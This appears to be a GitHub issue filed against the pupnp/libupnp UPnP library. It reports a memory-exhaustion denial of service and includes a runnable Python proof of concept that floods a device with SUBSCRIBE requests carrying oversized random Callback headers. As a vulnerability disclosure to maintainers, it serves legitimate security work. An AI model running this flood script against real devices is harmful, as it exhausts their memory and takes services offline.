search

pupnp / pupnp

libupnp: Build UPnP-compliant control points, devices, and bridges on several operating systems.
https://pupnp.github.io/pupnp
BSD 3-Clause "New" or "Revised" License
349 stars 114 forks source link

Continuously sending A large number of SUBSCRIBE packet with random callback, leads to memory resources exhausted. #435

Open xzjpgithub opened 6 months ago

xzjpgithub commented 6 months ago

hi~

Continuously sending A large number of SUBSCRIBE packet with random callback, for example, The following code is poc.In poc, callback is not only random, but also contains 0x10000 a(why 0x10000 a? To trigger memory resource exhaustion more quickly).

payload = """SUBSCRIBE /upnp/service/AVTransport/Event HTTP/1.1
Cache-Control: no-cache
Connection: Close
Pragma: no-cache
User-Agent: Microsoft-Windows/10.0 UPnP/1.0
NT: upnp:event
Callback: <http://192.168.1.44: 2869/upnp/eventing/tzdjdffymm1{}>
Timeout: Second-1800
Host: 192.168.1.4:25826
ServiceId: urn:upnp-org:serviceId:ConnectionManager

""".format("a" * 0x10000 + str(random.randint(0, 0xffffffff)))

for i in range(99999):
    s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    addr1 = ('192.168.1.4', 25826)
    s1.connect(addr1)
    s1.send(payload.encode())

If you run the code, pupnp will constantly consume memory until the system killing it.

for the reason, I think there are two threads, one for receiving, and the other for dealing. The speed of the one which receiving SUBSCRIBE packets is fast, but the speed of the one which dealing with SUBSCRIBE packets are low. For transferring packets between two threads ,threre must be a queue , which constantly consuming memory, for storing packets.

For some reason, I can't upload pictures to show the effect of the attack.

If you have any question, ping me

Best regards.